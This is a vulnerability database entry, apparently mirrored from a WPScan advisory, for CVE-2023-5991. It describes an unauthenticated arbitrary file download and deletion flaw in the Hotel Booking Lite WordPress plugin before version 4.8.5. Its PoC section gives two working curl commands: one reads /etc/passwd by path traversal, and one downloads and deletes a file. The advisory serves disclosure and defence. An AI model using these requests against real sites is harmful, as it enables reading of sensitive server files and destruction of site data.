Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbKrzysztof Zając (CERT PL)WPVDB-ID:E9D35E36-1E60-4483-B8B3-5CBF08FCD49E
HistoryDec 01, 2023 - 12:00 a.m.

Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion

2023-12-0100:00:00
Krzysztof Zając (CERT PL)
wpscan.com
13
plugin security; unauthenticated access; file deletion; csrf; authorization flaw

6.8 Medium

AI Score

Confidence

High

0.172 Low

EPSS

Percentile

96.1%

JSON

Description The plugin does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server

PoC

To download /etc/passwd: curl ‘https://example.com/?filename=../../../../../../etc/passwd&amp;mphb;_action=download’ To download and delete the /wp-content/uploads/delete-me.php file: curl ‘https://example.com/?filename=../delete-me.php&amp;mphb;_action=download&amp;remove;=1

CPENameOperatorVersion
eq4.8.5

Related

nuclei 1
nvd 1
cvelist 1
prion 1
cve 1
wpexploit 1
nuclei
nuclei
Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
2024-05-14 10:34:23
nvd
nvd
CVE-2023-5991
2023-12-26 19:15:08
cvelist
cvelist
CVE-2023-5991 Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion
2023-12-26 18:33:14
prion
prion
Design/Logic Flaw
2023-12-26 19:15:00
cve
cve
CVE-2023-5991
2023-12-26 19:15:08
wpexploit
wpexploit
Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion
2023-12-01 00:00:00

6.8 Medium

AI Score

Confidence

High

0.172 Low

EPSS

Percentile

96.1%

JSON
Related for WPVDB-ID:E9D35E36-1E60-4483-B8B3-5CBF08FCD49E
nuclei1nvd1cvelist1prion1cve1wpexploit1